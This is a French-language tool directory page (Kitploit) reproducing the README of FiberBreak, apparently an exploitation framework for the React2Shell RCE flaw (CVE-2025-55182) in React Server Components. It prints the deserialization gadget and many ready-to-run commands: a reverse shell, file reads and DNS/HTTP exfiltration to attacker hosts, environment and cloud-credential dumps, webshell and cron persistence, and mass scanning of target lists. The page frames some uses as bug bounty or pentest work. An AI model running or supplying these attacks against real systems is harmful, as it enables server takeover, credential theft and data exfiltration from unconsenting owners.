Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FiberBreak — Outil d'exploitation React2Shell (CVE-2025-55182) | Kitploit
Outils/GitHubGitHub/scumfrog/fiberbreak
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesPost-ExploitationTests d'IntrusionSécurité CloudCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
63il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubscumfrog/fiberbreak

FiberBreak

Outil d'exploitation React2Shell (CVE-2025-55182)

Voir le dépôt
Partager

FiberBreak

Cadre d'exploitation pour CVE-2025-55182 (React2Shell) – Vulnérabilité critique d'exécution de code à distance dans React Server Components.

Vue d'ensemble

  • CVE : CVE-2025-55182
  • CVSS : 10.0 (CRITIQUE)
  • Type : Exécution de code à distance (RCE)
  • Version affectée : React 19.0.0-rc.0 à 19.0.0, Next.js 15.0.0 à 15.0.3
  • Découverte : Lachlan Miller (SonarSource)
  • PoC public : maple3142

Installation

# Clone repository
git clone https://github.com/scumfrog/fiberbreak
cd fiberbreak

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x fiberbreak.py

Démarrage rapide

# Build vulnerable testing environment
docker-compose up -d

# Wait for startup
sleep 20

# Test detection
./fiberbreak.py -u http://localhost:3000 detect

# Execute RCE
./fiberbreak.py -u http://localhost:3000 exploit -c "whoami"

# Verify
docker exec react2shell-lab ls -la /tmp/

Détails techniques

Présentation de la vulnérabilité

CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance dans React Server Components (RSC) qui permet à des attaquants non authentifiés d'exécuter du code arbitraire sur le serveur.

Cause racine : Le protocole React Flight désérialise les entrées client non fiables sans validation appropriée, permettant aux attaquants de créer des charges utiles malveillantes qui abusent de la chaîne de prototypes de JavaScript et du constructeur Function.

Vecteur d'attaque : Les attaquants envoient une requête POST multipart/form-data forgée avec un en-tête Next-Action à n'importe quel point de terminaison RSC. La charge utile malveillante exploite :

  1. La pollution des prototypes via l'accès __proto__
  2. L'exposition du constructeur Function via constructor:constructor
  3. La résolution de promesses pour déclencher l'exécution de code

Flux d'exploitation

1. Attaquant envoie une requête POST forgée
   └─ multipart/form-data avec JSON malveillant
   └─ En-tête Next-Action (n'importe quelle valeur)

2. Le serveur désérialise la charge utile
   └─ React traite le format de chunk RSC
   └─ Résout l'objet de type Promise

3. La chaîne de gadgets se déclenche
   └─ L'accès __proto__ contourne les vérifications hasOwnProperty
   └─ constructor:constructor expose Function()
   └─ _prefix exécute du code arbitraire

4. RCE obtenue
   └─ Le serveur exécute le JavaScript de l'attaquant
   └─ Compromission totale du système

Le gadget

{
  "then": "$1:__proto__:then",           // Prototype pollution
  "status": "resolved_model",            // Fake React internal state
  "reason": -1,                          // Trigger resolution
  "value": '{"then":"$B1337"}',         // Blob reference
  "_response": {
    "_prefix": "MALICIOUS_CODE_HERE;",   // Executed code
    "_formData": {
      "get": "$1:constructor:constructor" // Function() access
    }
  }
}

Chemin de code affecté

// react-server-dom-webpack/src/ReactFlightClient.js
function resolveModelChunk(chunk) {
  const value = JSON.parse(chunk.value);
  
  // Missing validation here allows malicious chunks
  if (value && typeof value.then === 'function') {
    // Attacker controls 'then' method
    value.then(/* ... */);
  }
}

Utilisation

Détection de la vulnérabilité

# Single target detection
./fiberbreak.py -u https://target.com detect

# Multiple targets from file
./fiberbreak.py -l targets.txt detect --threads 20

# Save results to JSON
./fiberbreak.py -l targets.txt detect -o results.json

# Disable SSL verification
./fiberbreak.py -u https://target.com detect --no-verify-ssl

Exploitation de base

# Simple blind command execution
./fiberbreak.py -u https://target.com exploit -c "whoami"

# Write file to disk
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pwned.txt:HACKED" -t write_file

# Read file contents
./fiberbreak.py -u https://target.com exploit \
  -c "/etc/passwd:https://attacker.com" -t file_read

Exploitation avancée

# Reverse shell
./fiberbreak.py -u https://target.com exploit \
  -c "10.10.10.10:4444" -t reverse_shell

# DNS exfiltration (stealthy, no HTTP traffic)
./fiberbreak.py -u https://target.com exploit \
  -c "whoami:attacker.oastify.com" -t dns_exfil

# HTTP exfiltration with output
./fiberbreak.py -u https://target.com exploit \
  -c "id:https://attacker.com/exfil" -t http_exfil

# Environment variable dump
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/env" -t env_dump

# System reconnaissance
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/recon" -t recon

# Stealth DNS beacon (no command output)
./fiberbreak.py -u https://target.com exploit \
  -c "attacker.oastify.com" -t stealth_beacon

Exploitation cloud

# Auto-detect cloud provider and extract credentials
# Supports: AWS, GCP, Azure, DigitalOcean, Oracle Cloud, Alibaba Cloud
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/cloud" -t cloud_metadata

Types de charges utiles

TypeFormatDescriptionSortie
simplecommandExécute n'importe quelle commande shellAveugle
outputcommand + --callbackExécute avec rappel HTTPOui
reverse_shelllhost:lportReverse shell BashInteractive
dns_exfilcmd:domain ou domainExfiltration DNSJournaux DNS
http_exfilcmd:callback_urlExfiltration HTTPPOST HTTP
file_readfilepath:callbackLit et exfiltre un fichierPOST HTTP
write_filefilepath:contentÉcrit un fichier sur le disqueAveugle
env_dumpcallback_urlDécharge les variables d'environnementPOST HTTP
cloud_metadatacallback_urlExtrait les identifiants cloudPOST HTTP
reconcallback_urlReconnaissance systèmePOST HTTP
stealth_beacondomainBalise DNSJournaux DNS
webshellfilepathDéploie une webshell Node.jsPort 8080
persistcallback_urlInstalle une persistance cronTâche cron

Scénarios concrets

Chasse aux bogues (Bug Bounty)

# 1. Détection furtive avec balise DNS
./fiberbreak.py -u https://target.com exploit \
  -c "recon.yourburp.oastify.com" -t stealth_beacon

# 2. Si vulnérable, extraction de données sensibles
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/exfil" -t env_dump

# 3. Vérification de l'environnement cloud
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/cloud" -t cloud_metadata

# 4. Documenter les résultats sans causer de dommages

Tests d'intrusion

# Phase 1 : Détection
./fiberbreak.py -u https://target.com detect -o detection.json

# Phase 2 : Vérification
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pentest_proof.txt:PENTEST_$(date +%s)" -t write_file

# Phase 3 : Évaluation d'impact
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/impact" -t recon

# Phase 4 : Extraction d'identifiants (si cloud)
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/creds" -t cloud_metadata

# Phase 5 : Accès interactif (si autorisé)
# Terminal 1 : Démarrer un listener
nc -lvnp 4444

# Terminal 2 : Obtenir un shell
./fiberbreak.py -u https://target.com exploit \
  -c "YOUR_IP:4444" -t reverse_shell

Analyse de vulnérabilité de masse

# Create target list
cat > targets.txt << EOF
https://app1.company.com
https://app2.company.com
https://app3.company.com
https://api.company.com
EOF

# Scan all targets in parallel
./fiberbreak.py -l targets.txt detect --threads 50 -o scan_results.json

# Filter vulnerable targets
cat scan_results.json | jq '.[] | select(.vulnerable==true) | .url'
Télécharger l’outil